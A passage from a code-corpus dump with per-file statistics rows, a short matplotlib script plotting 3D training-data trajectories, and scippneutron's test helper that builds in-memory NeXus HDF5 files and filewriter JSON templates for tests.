| 23.77193 | 83 | 0.568266 | 132 | 1,355 | 5.621212 | 0.560606 | 0.09434 | 0.076819 | 0.070081 | 0.207547 | 0.118598 | 0 | 0 | 0 | 0 | 0 | 0.001031 | 0.284133 | 1,355 | 56 | 84 | 24.196429 | 0.763918 | 0.129889 | 0 | 0.195122 | 0 | 0.02439 | 0.401709 | 0.130769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04878 | 0 | 0.04878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c122eb2bc4fddfe34663b5e113bdd4620db9d3 | 1,305 | py | Python | work/plot.py | XUHUAKing/bigdata | 47cdccbd448eacf074c4521d5b40d1205b000fc6 | [
"CC-BY-4.0"
] | 6 | 2018-03-19T03:34:19.000Z | 2021-11-08T01:35:48.000Z | work/plot.py | XUHUAKing/bigdata | 47cdccbd448eacf074c4521d5b40d1205b000fc6 | [
"CC-BY-4.0"
] | null | null | null | work/plot.py | XUHUAKing/bigdata | 47cdccbd448eacf074c4521d5b40d1205b000fc6 | [
"CC-BY-4.0"
] | null | null | null | # needs a parameter to specify which training record to display
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import functions as fn
import sys
#from matplotlib.backends.backend_pdf import PdfPages
tdata, ttarget, tlabel = fn.get_training_data()
i = int(sys.argv[1])
tempdata = np.array([[0,0,0]])
for j in range(300):
if (tdata[i][j] == 0).all():
continue
temp = np.expand_dims(tdata[i][j], axis=0)
tempdata = np.append(tempdata, temp, axis=0)
tempdata = np.delete(tempdata, 0, 0)
t_data = tempdata.transpose((1, 0))
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_xlabel('x')
ax.set_ylabel('t')
ax.set_zlabel('y')
ax.view_init(0, 90)
ax.set_title(i)
x = t_data[0]
y = t_data[1]
t = t_data[2]
x_target = np.linspace(ttarget[i][0], ttarget[i][0], 1000)
y_target = np.linspace(np.mean(t_data[1]), np.mean(t_data[1]), 1000)
#y_target = np.linspace(ttarget[i][1], ttarget[i][1], 1000)
t_target = np.linspace(np.min(t_data[2]), np.max(t_data[2]), 1000)
label = ['fake', 'real']
plt_label = label[int(tlabel[i][0])]
ax.plot(x, t, y, label=plt_label)
ax.plot(x_target, t_target, y_target, label="target: "+str(ttarget[i][0])+", "+str(ttarget[i][1]))
ax.legend()
plt.show() | 30.348837 | 98 | 0.691954 | 238 | 1,305 | 3.680672 | 0.37395 | 0.045662 | 0.073059 | 0.034247 | 0.111872 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.123372 | 1,305 | 43 | 99 | 30.348837 | 0.72028 | 0.131034 | 0 | 0 | 0 | 0 | 0.033599 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44c3145c6b5a8cac5b0e2f9068f7547381896e10 | 31,414 | py | Python | python/tests/nexus_helpers.py | arm61/scippneutron | 20283e7b8f8772776978c539f8664f889d1fbded | [
"BSD-3-Clause"
] | null | null | null | python/tests/nexus_helpers.py | arm61/scippneutron | 20283e7b8f8772776978c539f8664f889d1fbded | [
"BSD-3-Clause"
] | null | null | null | python/tests/nexus_helpers.py | arm61/scippneutron | 20283e7b8f8772776978c539f8664f889d1fbded | [
"BSD-3-Clause"
] | null | null | null | from dataclasses import dataclass
from typing import List, Union, Iterator, Optional, Dict, Any, Tuple
import h5py
import numpy as np
from enum import Enum
from contextlib import contextmanager
import json
from scippneutron.file_loading._json_nexus import LoadFromJson, MissingDataset
# Type alias: anywhere an HDF5 "parent" is accepted, either the file
# itself or a group within it may be passed.
h5root = Union[h5py.File, h5py.Group]
def _create_nx_class(group_name: str, nx_class_name: str, parent: h5root) -> h5py.Group:
    """Create *group_name* under *parent* and tag it with the given
    NX_class attribute; returns the newly created group."""
    group = parent.create_group(group_name)
    group.attrs["NX_class"] = nx_class_name
    return group
@contextmanager
def in_memory_hdf5_file_with_two_nxentry() -> Iterator[h5py.File]:
    """Yield a purely in-memory HDF5 file holding two NXentry groups,
    closing the file when the context exits."""
    # "core" driver with backing_store=False keeps the file in memory
    # and never writes it to disk.
    handle = h5py.File('in_memory_events.nxs',
                       mode='w',
                       driver="core",
                       backing_store=False)
    try:
        for entry_name in ("entry_1", "entry_2"):
            _create_nx_class(entry_name, "NXentry", handle)
        yield handle
    finally:
        handle.close()
@dataclass
class EventData:
    """Contents of an NXevent_data group (pulse-grouped event lists)."""
    event_id: Optional[np.ndarray]  # detector id of each event
    event_time_offset: Optional[np.ndarray]  # event time within its pulse
    event_time_zero: Optional[np.ndarray]  # timestamp of each pulse
    event_index: Optional[np.ndarray]  # first-event index of each pulse
    event_time_zero_unit: Optional[Union[str, bytes]] = "ns"
    event_time_zero_offset: Optional[Union[str, bytes]] = "1970-01-01T00:00:00Z"
    event_time_offset_unit: Optional[Union[str, bytes]] = "ns"
@dataclass
class Log:
    """An NXlog: a named value, optionally recorded as a time series."""
    name: str
    value: Optional[np.ndarray]
    time: Optional[np.ndarray] = None  # timestamps of the time series, if any
    value_units: Optional[Union[str, bytes]] = None
    # From
    # https://manual.nexusformat.org/classes/base_classes/NXlog.html?highlight=nxlog
    # time units are non-optional if time series data is present, and the unit
    # must be a unit of time (i.e. convertible to seconds).
    time_units: Optional[Union[str, bytes]] = "s"
    start_time: Optional[Union[str, bytes]] = None
    scaling_factor: Optional[float] = None
class TransformationType(Enum):
    """Allowed values of the NXtransformations "transformation_type" attribute."""
    TRANSLATION = "translation"
    ROTATION = "rotation"
@dataclass
class Transformation:
    """One NXtransformations axis (a translation or a rotation)."""
    transform_type: TransformationType
    vector: np.ndarray  # direction/axis of the translation or rotation
    value: Optional[np.ndarray]
    time: Optional[np.ndarray] = None  # timestamps for time-dependent values
    # Next transformation in the chain: another Transformation, an
    # absolute path string, or None for the end of the chain.
    depends_on: Union["Transformation", str, None] = None
    offset: Optional[np.ndarray] = None
    value_units: Optional[Union[str, bytes]] = None
    time_units: Optional[Union[str, bytes]] = None
@dataclass
class Detector:
    """An NXdetector with optional geometry, event data and a log."""
    detector_numbers: Optional[np.ndarray] = None
    event_data: Optional[EventData] = None
    log: Optional[Log] = None
    x_offsets: Optional[np.ndarray] = None  # per-pixel offsets, one array
    y_offsets: Optional[np.ndarray] = None  # per spatial axis
    z_offsets: Optional[np.ndarray] = None
    offsets_unit: Optional[Union[str, bytes]] = None
    depends_on: Optional[Transformation] = None  # position transformation chain
@dataclass
class Sample:
    """An NXsample with optional position and crystal orientation data."""
    name: str
    depends_on: Optional[Transformation] = None
    distance: Optional[float] = None
    distance_units: Optional[Union[str, bytes]] = None
    ub_matrix: Optional[np.ndarray] = None  # UB matrix of the crystal
    orientation_matrix: Optional[np.ndarray] = None
@dataclass
class Source:
    """An NXsource group."""
    name: str
    # A Transformation, a path string to an existing transformation, or None.
    depends_on: Union[Transformation, None, str] = None
    distance: Optional[float] = None
    distance_units: Optional[Union[str, bytes]] = None
@dataclass
class Chopper:
    """An NXdisk_chopper with its distance and rotation speed."""
    name: str
    distance: float
    rotation_speed: float
    distance_units: Optional[str] = None
    rotation_units: Optional[str] = None
@dataclass
class Link:
    """A link to create at *new_path* pointing at *target_path*."""
    new_path: str
    target_path: str
@dataclass
class DatasetAtPath:
    """A dataset to write at an absolute *path*, with its attributes."""
    path: str
    data: np.ndarray
    attributes: Dict[str, Any]
@dataclass
class Stream:
    """
    Only present in the JSON NeXus file templates, not in HDF5 NeXus files.
    Records where to find data in Kafka that are streamed during an experiment.
    The default field values describe a simple f142 (timeseries) stream.
    """
    # Where the builder should place the stream object
    path: str
    # The following members correspond to fields in stream object.
    # Some of them may not be of interest to Scipp but are to other
    # software which consume the json template, for example
    # the Filewriter (https://github.com/ess-dmsc/kafka-to-nexus)
    # Kafka topic (named data stream)
    topic: str = "motion_devices_topic"
    # Source name, allows filtering and multiplexing to different
    # writer_modules by the filewriter software
    source: str = "linear_axis"
    # Tells filewriter which plugin to use to deserialise
    # messages in this stream and how to write the data to file.
    # For example the "f142" writer module deserialises messages which
    # were serialised with the "f142" flatbuffer schema
    # (https://github.com/ess-dmsc/streaming-data-types/) and
    # writes resulting timeseries data to file as an NXlog
    # (https://manual.nexusformat.org/classes/base_classes/NXlog.html)
    writer_module: str = "f142"
    # Deserialised values are expected to be of this type
    type: str = "double"
    # Values have these units
    value_units: str = "m"
@dataclass
class Monitor:
    """An NXmonitor: histogram *data* over named *axes*, with optional
    event-mode data."""
    name: str
    data: np.ndarray
    axes: List[Tuple[str, np.ndarray]]  # (axis name, axis values) pairs
    events: Optional[EventData] = None
class InMemoryNeXusWriter:
    """Writer backend that builds NeXus structures directly in an h5py
    file or group (used with in-memory HDF5 files in tests)."""

    def add_dataset_at_path(self, file_root: h5py.File, path: str, data: np.ndarray,
                            attributes: Dict):
        """Create a dataset at the absolute *path* and attach *attributes*."""
        parent_path, _, dataset_name = path.rpartition("/")
        dataset = self.add_dataset(file_root[parent_path], dataset_name, data)
        for attribute_name, attribute_value in attributes.items():
            self.add_attribute(dataset, attribute_name, attribute_value)

    @staticmethod
    def add_dataset(parent: h5py.Group, name: str,
                    data: Union[str, bytes, np.ndarray]) -> h5py.Dataset:
        """Create and return a child dataset of *parent*."""
        return parent.create_dataset(name, data=data)

    @staticmethod
    def add_attribute(parent: Union[h5py.Group, h5py.Dataset], name: str,
                      value: Union[str, bytes, np.ndarray]):
        """Set an HDF5 attribute on a group or dataset."""
        parent.attrs[name] = value

    @staticmethod
    def add_group(parent: h5py.Group, name: str) -> h5py.Group:
        """Create and return a child group of *parent*."""
        return parent.create_group(name)

    @staticmethod
    def _delete_if_present(file_root: h5py.File, path: str):
        """Remove any existing object at *path*; absence is not an error."""
        try:
            _ = file_root[path]
            del file_root[path]
        except KeyError:
            pass

    @staticmethod
    def add_hard_link(file_root: h5py.File, new_path: str, target_path: str):
        """Hard-link *new_path* to the object at *target_path*, replacing
        anything already present at *new_path*."""
        InMemoryNeXusWriter._delete_if_present(file_root, new_path)
        file_root[new_path] = file_root[target_path]

    @staticmethod
    def add_soft_link(file_root: h5py.File, new_path: str, target_path: str):
        """Create a soft link at *new_path* pointing to *target_path*,
        replacing anything already present at *new_path*."""
        InMemoryNeXusWriter._delete_if_present(file_root, new_path)
        file_root[new_path] = h5py.SoftLink(target_path)
# Maps numpy scalar types to the type-name strings used in the
# filewriter JSON template format.
numpy_to_filewriter_type = {
    np.float32: "float32",
    np.float64: "float64",
    np.int8: "int8",
    np.int16: "int16",
    np.int32: "int32",
    np.int64: "int64",
    np.uint8: "uint8",
    np.uint16: "uint16",
    np.uint32: "uint32",
    np.uint64: "uint64"
}
def _add_link_to_json(file_root: Dict, new_path: str, target_path: str):
    """Insert a filewriter "link" object at *new_path* in the JSON
    template, replacing any existing child of the same name."""
    parent_path, _, link_name = new_path.rpartition("/")
    nexus = LoadFromJson(file_root)
    parent_group = nexus.get_object_by_path(file_root, parent_path)
    # Drop any child already occupying the link's name.
    previous = nexus.get_child_from_group(parent_group, link_name)
    if previous is not None:
        parent_group["children"].remove(previous)
    parent_group["children"].append(
        {"type": "link", "name": link_name, "target": target_path})
def _parent_and_name_from_path(file_root: Dict, path: str) -> Tuple[Dict, str]:
    """Resolve *path* in the JSON template to its parent group object and
    the final path component's name."""
    parent_path, _, name = path.rpartition("/")
    parent_group = LoadFromJson(file_root).get_object_by_path(file_root, parent_path)
    return parent_group, name
class JsonWriter:
    """Writer backend that builds the JSON template structure consumed by
    the ESS filewriter, mirroring InMemoryNeXusWriter's interface.

    The exact keys and type-name strings emitted here are part of the
    template format and must not be changed.
    """
    def add_dataset_at_path(self, file_root: Dict, path: str, data: np.ndarray,
                            attributes: Dict):
        """Create a dataset object at the absolute *path* with *attributes*."""
        parent_group, dataset_name = _parent_and_name_from_path(file_root, path)
        dataset = self.add_dataset(parent_group, dataset_name, data)
        for name, value in attributes.items():
            self.add_attribute(dataset, name, value)

    @staticmethod
    def add_dataset(parent: Dict, name: str, data: Union[str, bytes,
                                                         np.ndarray]) -> Dict:
        """Append a dataset object to *parent*'s children and return it."""
        # Describe the stored type the way the filewriter expects.
        if isinstance(data, (str, bytes)):
            dataset_info = {"string_size": len(data), "type": "string"}
        elif isinstance(data, float):
            dataset_info = {"size": 1, "type": "float64"}
        elif isinstance(data, int):
            # NOTE(review): plain ints are declared "int32" here but "int64"
            # in add_attribute - confirm this asymmetry is intentional.
            dataset_info = {"size": 1, "type": "int32"}
        else:
            dataset_info = {
                "size": data.shape,
                "type": numpy_to_filewriter_type[data.dtype.type]
            }
        new_dataset = {
            "type": "dataset",
            "name": name,
            "values": data,
            "dataset": dataset_info,
            "attributes": []
        }
        parent["children"].append(new_dataset)
        return new_dataset

    @staticmethod
    def add_attribute(parent: Dict, name: str, value: Union[str, bytes, np.ndarray]):
        """Attach an attribute object to a group or dataset dict."""
        if isinstance(value, (str, bytes)):
            attr_info = {"string_size": len(value), "type": "string"}
        elif isinstance(value, float):
            attr_info = {"size": 1, "type": "float64"}
        elif isinstance(value, int):
            attr_info = {"size": 1, "type": "int64"}
        else:
            attr_info = {
                "size": value.shape,
                "type": numpy_to_filewriter_type[value.dtype.type]
            }
        name_and_value = {"name": name, "values": value}
        parent["attributes"].append({**attr_info, **name_and_value})

    @staticmethod
    def add_group(parent: Dict, name: str) -> Dict:
        """Append an empty group object to *parent* and return it."""
        new_group = {"type": "group", "name": name, "children": [], "attributes": []}
        parent["children"].append(new_group)
        return new_group

    @staticmethod
    def add_hard_link(file_root: Dict, new_path: str, target_path: str):
        """Create a link object (JSON templates have one link kind only)."""
        _add_link_to_json(file_root, new_path, target_path)

    @staticmethod
    def add_soft_link(file_root: Dict, new_path: str, target_path: str):
        """Create a link object (JSON templates have one link kind only)."""
        _add_link_to_json(file_root, new_path, target_path)

    def add_stream(self, file_root: Dict, stream: Stream):
        """Insert a stream object at ``stream.path``, creating the group
        there if it does not yet exist."""
        new_stream = {
            "type": "stream",
            "stream": {
                "topic": stream.topic,
                "source": stream.source,
                "writer_module": stream.writer_module,
                "type": stream.type,
                "value_units": stream.value_units
            }
        }
        nexus = LoadFromJson(file_root)
        try:
            group = nexus.get_object_by_path(file_root, stream.path)
        except MissingDataset:
            # The target group is missing: create it under its parent first.
            parent, name = _parent_and_name_from_path(file_root, stream.path)
            group = self.add_group(parent, name)
        group["children"].append(new_stream)
class NumpyEncoder(json.JSONEncoder):
    """JSON encoder that serialises numpy arrays as (nested) lists."""
    def default(self, obj):
        # Only ndarray gets special treatment; everything else defers to
        # the base class (which raises TypeError for unknown types).
        if not isinstance(obj, np.ndarray):
            return json.JSONEncoder.default(self, obj)
        return obj.tolist()
class NexusBuilder:
"""
Allows building an in-memory NeXus file for use in tests
"""
    def __init__(self):
        """Initialise an empty builder; components are registered via the
        ``add_*`` methods and written out by :meth:`file`, ``json_string``
        or the ``create_*`` helpers."""
        self._event_data: List[EventData] = []
        self._detectors: List[Detector] = []
        self._logs: List[Log] = []
        self._instrument_name: Optional[str] = None
        self._choppers: List[Chopper] = []
        self._title: Optional[str] = None
        self._start_time: Optional[str] = None
        self._end_time: Optional[str] = None
        self._sample: List[Sample] = []
        self._source: List[Source] = []
        self._hard_links: List[Link] = []
        self._soft_links: List[Link] = []
        # Set to an InMemoryNeXusWriter or JsonWriter when writing begins.
        self._writer = None
        self._datasets: List[DatasetAtPath] = []
        self._streams: List[Stream] = []
        self._monitors: List[Monitor] = []
    def add_dataset_at_path(self, path: str, data: np.ndarray, attributes: Dict):
        """Register a dataset to be written at an absolute *path* in the file."""
        self._datasets.append(DatasetAtPath(path, data, attributes))
    def _write_datasets(self, root: Union[Dict, h5py.File]):
        """Write every dataset registered via :meth:`add_dataset_at_path`."""
        for dataset in self._datasets:
            self._writer.add_dataset_at_path(root, dataset.path, dataset.data,
                                             dataset.attributes)
    def add_stream(self, stream: Stream):
        """Register a Kafka stream placeholder (JSON templates only)."""
        self._streams.append(stream)
    def add_detector(self, detector: Detector):
        """Register a detector to be written as an NXdetector group."""
        self._detectors.append(detector)
    def add_event_data(self, event_data: EventData):
        """Register standalone event data (NXevent_data under the entry)."""
        self._event_data.append(event_data)
    def add_log(self, log: Log):
        """Register a standalone log to be written as an NXlog group."""
        self._logs.append(log)
    def add_instrument(self, name: str):
        """Set the instrument name; an NXinstrument group holding it is
        created on write, and detectors/choppers are nested inside it."""
        self._instrument_name = name
    def add_chopper(self, chopper: Chopper):
        """Register a chopper to be written as an NXdisk_chopper group."""
        self._choppers.append(chopper)
    def add_title(self, title: str):
        """Set the "title" dataset of the NXentry group."""
        self._title = title
    def add_run_start_time(self, start_time: str):
        """Set the "start_time" dataset of the NXentry group."""
        self._start_time = start_time
    def add_run_end_time(self, end_time: str):
        """Set the "end_time" dataset of the NXentry group."""
        self._end_time = end_time
    def add_sample(self, sample: Sample):
        """Register a sample to be written as an NXsample group."""
        self._sample.append(sample)
    def add_source(self, source: Source):
        """Register a source to be written as an NXsource group."""
        self._source.append(source)
    def add_hard_link(self, link: Link):
        """Register a hard link to create on write.

        If there is a group or dataset at the link path it will
        be replaced by the link
        """
        self._hard_links.append(link)
    def add_soft_link(self, link: Link):
        """Register a soft link to create on write.

        If there is a group or dataset at the link path it will
        be replaced by the link
        """
        self._soft_links.append(link)
def add_component(self, component: Union[Sample, Source]):
# This is a little ugly, but allows parametrisation
# of tests which should work for sample and source
if isinstance(component, Sample):
self.add_sample(component)
elif isinstance(component, Source):
self.add_source(component)
    def add_monitor(self, monitor: Monitor):
        """Register a monitor to be written as an NXmonitor group."""
        self._monitors.append(monitor)
    @property
    def json_string(self):
        """Serialise the builder contents as a filewriter JSON template string."""
        self._writer = JsonWriter()
        root = {"children": []}
        self._write_file(root)
        return json.dumps(root, indent=4, cls=NumpyEncoder)
    def create_json_file(self):
        """
        Create a file on disk, do not use this in tests, it is intended to
        be used as a tool during test development.

        Writes the JSON template to ``test_json.txt`` in the working
        directory.
        """
        self._writer = JsonWriter()
        root = {"children": []}
        self._write_file(root)
        with open("test_json.txt", "w") as json_file:
            return json.dump(root, json_file, indent=4, cls=NumpyEncoder)
    @contextmanager
    def file(self) -> Iterator[h5py.File]:
        """Yield the built NeXus structure as an in-memory ``h5py.File``;
        the file is always closed when the context exits."""
        # "core" driver means file is "in-memory" not on disk.
        # backing_store=False prevents file being written to
        # disk on flush() or close().
        nexus_file = h5py.File('in_memory_events.nxs',
                               mode='w',
                               driver="core",
                               backing_store=False)
        self._writer = InMemoryNeXusWriter()
        try:
            self._write_file(nexus_file)
            yield nexus_file
        finally:
            nexus_file.close()
    def _write_file(self, nexus_file: Union[h5py.File, Dict]):
        """Write every registered component into *nexus_file*.

        Everything goes under a single top-level NXentry group; detectors
        and choppers are nested in an NXinstrument group when an instrument
        name was set, otherwise directly under the entry. Links are created
        last so that any hard-link targets already exist.
        """
        entry_group = self._create_nx_class("entry", "NXentry", nexus_file)
        if self._title is not None:
            self._writer.add_dataset(entry_group, "title", data=self._title)
        if self._start_time is not None:
            self._writer.add_dataset(entry_group, "start_time", data=self._start_time)
        if self._end_time is not None:
            self._writer.add_dataset(entry_group, "end_time", data=self._end_time)
        self._write_event_data(entry_group)
        self._write_logs(entry_group)
        self._write_sample(entry_group)
        self._write_source(entry_group)
        if self._instrument_name is None:
            parent_group = entry_group
            parent_path = "/entry"
        else:
            parent_group = self._write_instrument(entry_group)
            parent_path = "/entry/instrument"
        self._write_choppers(parent_group)
        self._write_detectors(parent_group, parent_path)
        # These take the file root because their targets use absolute paths.
        self._write_datasets(nexus_file)
        self._write_streams(nexus_file)
        self._write_links(nexus_file)
        self._write_monitors(nexus_file)
    def create_file_on_disk(self, filename: str):
        """
        Create a file on disk, do not use this in tests, it is intended to
        be used as a tool during test development. Output file can be
        explored using a tool such as HDFView.
        """
        nexus_file = h5py.File(filename, mode='w')
        self._writer = InMemoryNeXusWriter()
        try:
            self._write_file(nexus_file)
        finally:
            # Ensure the HDF5 handle is released even if writing fails.
            nexus_file.close()
    def _write_links(self, file_root: Union[h5py.Group, Dict]):
        """Create all registered hard links, then all soft links."""
        for hard_link in self._hard_links:
            self._writer.add_hard_link(file_root, hard_link.new_path,
                                       hard_link.target_path)
        for soft_link in self._soft_links:
            self._writer.add_soft_link(file_root, soft_link.new_path,
                                       soft_link.target_path)
    def _write_sample(self, parent_group: Union[h5py.Group, Dict]):
        """Write each registered sample as an NXsample group with its
        optional transformation chain, distance and matrices."""
        for sample in self._sample:
            sample_group = self._create_nx_class(sample.name, "NXsample", parent_group)
            if sample.depends_on is not None:
                depends_on = self._add_transformations_to_file(
                    sample.depends_on, sample_group, f"/entry/{sample.name}")
                self._writer.add_dataset(sample_group, "depends_on", data=depends_on)
            if sample.distance is not None:
                distance_ds = self._writer.add_dataset(sample_group,
                                                       "distance",
                                                       data=sample.distance)
                if sample.distance_units is not None:
                    self._writer.add_attribute(distance_ds, "units",
                                               sample.distance_units)
            if sample.ub_matrix is not None:
                self._writer.add_dataset(sample_group,
                                         "ub_matrix",
                                         data=sample.ub_matrix)
            if sample.orientation_matrix is not None:
                self._writer.add_dataset(sample_group,
                                         "orientation_matrix",
                                         data=sample.orientation_matrix)
    def _write_source(self, parent_group: Union[h5py.Group, Dict]):
        """Write each registered source as an NXsource group."""
        for source in self._source:
            source_group = self._create_nx_class(source.name, "NXsource", parent_group)
            if source.depends_on is not None:
                if isinstance(source.depends_on, str):
                    # A string is treated as the path of an existing
                    # transformation and written verbatim.
                    depends_on = source.depends_on
                else:
                    depends_on = self._add_transformations_to_file(
                        source.depends_on, source_group, f"/entry/{source.name}")
                self._writer.add_dataset(source_group, "depends_on", data=depends_on)
            if source.distance is not None:
                distance_ds = self._writer.add_dataset(source_group,
                                                       "distance",
                                                       data=source.distance)
                if source.distance_units is not None:
                    self._writer.add_attribute(distance_ds, "units",
                                               source.distance_units)
    def _write_instrument(
            self, parent_group: Union[h5py.Group, Dict]) -> Union[h5py.Group, Dict]:
        """Create and return the NXinstrument group holding the instrument name."""
        instrument_group = self._create_nx_class("instrument", "NXinstrument",
                                                 parent_group)
        self._writer.add_dataset(instrument_group, "name", self._instrument_name)
        return instrument_group
    def _write_detectors(self, parent_group: Union[h5py.Group, Dict], parent_path: str):
        """Write each detector as a detector_<n> group under *parent_group*,
        with optional event data, log, and transformation chain."""
        for detector_index, detector in enumerate(self._detectors):
            detector_name = f"detector_{detector_index}"
            detector_group = self._add_detector_group_to_file(
                detector, parent_group, detector_name)
            if detector.event_data is not None:
                self._add_event_data_group_to_file(detector.event_data, detector_group,
                                                   "events")
            if detector.log is not None:
                self._add_log_group_to_file(detector.log, detector_group)
            if detector.depends_on is not None:
                depends_on = self._add_transformations_to_file(
                    detector.depends_on, detector_group,
                    f"{parent_path}/{detector_name}")
                self._writer.add_dataset(detector_group, "depends_on", data=depends_on)
def _write_choppers(self, parent_group: Union[h5py.Group, Dict]):
for chopper in self._choppers:
chopper_group = self._create_nx_class(chopper.name, "NXdisk_chopper",
parent_group)
distance_ds = self._writer.add_dataset(chopper_group,
"distance",
data=chopper.distance)
rotation_ds = self._writer.add_dataset(chopper_group,
"rotation_speed",
data=chopper.rotation_speed)
if chopper.distance_units is not None:
self._writer.add_attribute(distance_ds, "units", chopper.distance_units)
if chopper.rotation_units is not None:
self._writer.add_attribute(rotation_ds, "units", chopper.rotation_units)
def _write_event_data(self, parent_group: Union[h5py.Group, Dict]):
for event_data_index, event_data in enumerate(self._event_data):
self._add_event_data_group_to_file(event_data, parent_group,
f"events_{event_data_index}")
def _write_monitors(self, parent_group: Union[h5py.Group, Dict]):
for monitor in self._monitors:
self._add_monitor_group_to_file(monitor, parent_group)
def _add_monitor_group_to_file(self, monitor: Monitor, parent_group: h5py.Group):
monitor_group = self._create_nx_class(monitor.name, "NXmonitor", parent_group)
data_group = self._writer.add_dataset(monitor_group, "data", monitor.data)
self._writer.add_attribute(data_group, "axes",
",".join(name for name, _ in monitor.axes))
if monitor.events:
self._write_event_data_to_group(monitor_group, monitor.events)
for axis_name, axis_data in monitor.axes:
# We write event data (if exists) first - if we've already written event
# data the event index will already have been created so we skip writing
# it here.
if not monitor.events or not axis_name == "event_index":
self._writer.add_dataset(monitor_group, axis_name, axis_data)
def _write_logs(self, parent_group: Union[h5py.Group, Dict]):
for log in self._logs:
self._add_log_group_to_file(log, parent_group)
def _add_event_data_group_to_file(self, data: EventData, parent_group: h5py.Group,
group_name: str):
event_group = self._create_nx_class(group_name, "NXevent_data", parent_group)
self._write_event_data_to_group(event_group, data)
def _write_event_data_to_group(self, event_group: h5py.Group, data: EventData):
if data.event_id is not None:
self._writer.add_dataset(event_group, "event_id", data=data.event_id)
if data.event_time_offset is not None:
event_time_offset_ds = self._writer.add_dataset(event_group,
"event_time_offset",
data=data.event_time_offset)
self._writer.add_attribute(event_time_offset_ds, "units",
data.event_time_offset_unit)
if data.event_time_zero is not None:
event_time_zero_ds = self._writer.add_dataset(event_group,
"event_time_zero",
data=data.event_time_zero)
self._writer.add_attribute(event_time_zero_ds, "units",
data.event_time_zero_unit)
self._writer.add_attribute(event_time_zero_ds, "offset",
data.event_time_zero_offset)
if data.event_index is not None:
self._writer.add_dataset(event_group, "event_index", data=data.event_index)
def _add_transformations_to_file(self, transform: Transformation,
parent_group: h5py.Group, parent_path: str) -> str:
transform_chain = [transform]
while transform.depends_on is not None and not isinstance(
transform.depends_on, str):
transform_chain.append(transform.depends_on)
transform = transform.depends_on
transforms_group_name = "transformations"
transforms_group = self._create_nx_class("transformations", "NXtransformations",
parent_group)
transform_chain.reverse()
depends_on_str = transform.depends_on if isinstance(transform.depends_on,
str) else None
transform_group_path = f"{parent_path}/{transforms_group_name}"
for transform_number, transform in enumerate(transform_chain):
if transform.time is not None:
depends_on_str = self._add_transformation_as_log(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
else:
depends_on_str = self._add_transformation_as_dataset(
transform, transform_number, transforms_group, transform_group_path,
depends_on_str)
return depends_on_str
def _add_transformation_as_dataset(self, transform: Transformation,
transform_number: int,
transforms_group: h5py.Group, group_path: str,
depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._writer.add_dataset(transforms_group,
f"transform_{transform_number}",
data=transform.value)
self._add_transform_attributes(added_transform, depends_on, transform)
if transform.value_units is not None:
self._writer.add_attribute(added_transform, "units", transform.value_units)
return f"{group_path}/{transform_name}"
def _add_log_group_to_file(self, log: Log, parent_group: h5py.Group) -> h5py.Group:
log_group = self._create_nx_class(log.name, "NXlog", parent_group)
if log.value is not None:
value_ds = self._writer.add_dataset(log_group, "value", log.value)
if log.value_units is not None:
self._writer.add_attribute(value_ds, "units", log.value_units)
if log.time is not None:
time_ds = self._writer.add_dataset(log_group, "time", data=log.time)
if log.time_units is not None:
self._writer.add_attribute(time_ds, "units", log.time_units)
if log.start_time is not None:
self._writer.add_attribute(time_ds, "start", log.start_time)
if log.scaling_factor is not None:
self._writer.add_attribute(time_ds, "scaling_factor",
log.scaling_factor)
return log_group
def _add_transformation_as_log(self, transform: Transformation,
transform_number: int, transforms_group: h5py.Group,
group_path: str, depends_on: Optional[str]) -> str:
transform_name = f"transform_{transform_number}"
added_transform = self._add_log_group_to_file(
Log(transform_name, transform.value, transform.time, transform.value_units,
transform.time_units), transforms_group)
self._add_transform_attributes(added_transform, depends_on, transform)
return f"{group_path}/{transform_name}"
def _add_detector_group_to_file(self, detector: Detector, parent_group: h5py.Group,
group_name: str) -> h5py.Group:
detector_group = self._create_nx_class(group_name, "NXdetector", parent_group)
if detector.detector_numbers is not None:
self._writer.add_dataset(detector_group, "detector_number",
detector.detector_numbers)
for dataset_name, array in (("x_pixel_offset", detector.x_offsets),
("y_pixel_offset", detector.y_offsets),
("z_pixel_offset", detector.z_offsets)):
if array is not None:
offsets_ds = self._writer.add_dataset(detector_group, dataset_name,
array)
if detector.offsets_unit is not None:
self._writer.add_attribute(offsets_ds, "units",
detector.offsets_unit)
return detector_group
def _add_transform_attributes(self, added_transform: Union[h5py.Group,
h5py.Dataset],
depends_on: Optional[str], transform: Transformation):
self._writer.add_attribute(added_transform, "vector", transform.vector)
self._writer.add_attribute(added_transform, "transformation_type",
transform.transform_type.value)
if transform.offset is not None:
self._writer.add_attribute(added_transform, "offset", transform.offset)
if depends_on is not None:
self._writer.add_attribute(added_transform, "depends_on", depends_on)
else:
self._writer.add_attribute(added_transform, "depends_on",
".") # means end of chain
def _create_nx_class(self, group_name: str, nx_class_name: str,
parent: h5root) -> h5py.Group:
nx_class = self._writer.add_group(parent, group_name)
self._writer.add_attribute(nx_class, "NX_class", nx_class_name)
return nx_class
def _write_streams(self, root: Union[h5py.File, Dict]):
if isinstance(self._writer, JsonWriter):
for stream in self._streams:
self._writer.add_stream(root, stream)
